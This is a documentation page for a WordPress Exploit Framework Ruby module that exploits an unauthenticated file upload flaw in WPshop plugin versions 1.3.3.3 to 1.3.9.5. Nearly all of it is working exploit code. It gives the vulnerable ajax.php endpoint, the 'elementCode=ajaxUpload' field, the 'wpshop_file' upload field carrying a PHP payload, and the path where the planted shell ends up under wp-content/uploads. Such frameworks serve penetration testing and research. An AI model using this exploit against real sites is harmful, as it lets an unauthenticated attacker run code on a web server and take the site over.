class Wpxf::Exploit::WpshopShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'WPshop Shell Upload',
    desc: 'This module exploits a file upload vulnerability in versions '\
          '1.3.3.3 to 1.3.9.5 of the WPshop plugin which '\
          'allows unauthenticated users to upload and execute PHP scripts '\
          'in the context of the web server.',
    author: [
      'g0blin',    # Vulnerability discovery
      'rastating'  # WPXF module
    ],
    references: [
      ['WPVDB', '7830'],
      ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
    ],
    date: 'Mar 09 2015'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 27
def check
  check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
end
payload_body_builder() click to toggle source
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 31
def payload_body_builder
  builder = Utility::BodyBuilder.new
  builder.add_field('elementCode', 'ajaxUpload')
  builder.add_file_from_string('wpshop_file', payload.encoded, payload_name)
  builder
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 42
def uploaded_payload_location
  normalize_uri(wordpress_url_wp_content, 'uploads', payload_name)
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 38
def uploader_url
  normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php')
end